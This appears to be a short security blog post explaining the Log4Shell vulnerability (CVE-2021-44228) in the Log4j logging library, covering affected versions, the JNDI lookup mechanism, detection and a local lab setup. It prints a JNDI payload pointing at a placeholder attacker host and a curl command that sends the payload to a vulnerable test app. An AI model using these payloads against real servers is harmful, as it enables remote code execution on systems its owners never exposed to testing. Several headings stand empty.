[AppSec] Log4Shell (CVE-2021–44228)

bigb0ss
2 min readDec 15, 2021

--

Source: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

What is Log4J?

Log4J (or Log4J version 2) is an open source Java Library and one of the most popular Java logging frameworks. All versions of log4j-core from 2.0-beta9 to 2.14.1 are vulnerable to this vulnerability (CVE-2021–44228).

Why is it critical?

An attacker could gain unauthenticated Remote Code Execution (RCE) by exploiting this vulnerability. Also, payloads can be delivered in many different ways such as HTTP requests, user-controlled fields, SMS message, email, change of computer name and more. Finally, due to the popularity of the Log4J, a lot of companies are vulnerable to this vulnerability.

What is the vulnerability?

The vulnerable version of the Log4J server will log a payload (e.g., ${jndi:ldap://<ATTACKER IP>/a}) sent by an attacker. This can trigger the vulnerability to make the server a request to the attacker’s control server to execute the second stage payload (e.g., exploit.class) via JNDI (Java Naming and Directory Interface) injection.

How to identify the vulnerability?

It can be as simple as trying to make an HTTP request to do a DNS lookup against the vulnerable server(s). One can use CanaryToken or Burp Collaborator to verify the DNS query.

How to mitigate?

Detecting PoC:

Exploit PoC:

RCE Payload PoC:

Log4Shell WAF Bypass:

Labs / Vulnerable App:

# Running the server
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
# Exploit
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'

Defense:

--

--

bigb0ss

OSWE | OSCE | OSCP | CREST | Principal Offensive Security Engineer — All about Penetration Test, Red Team, Cloud Security, Web Application Security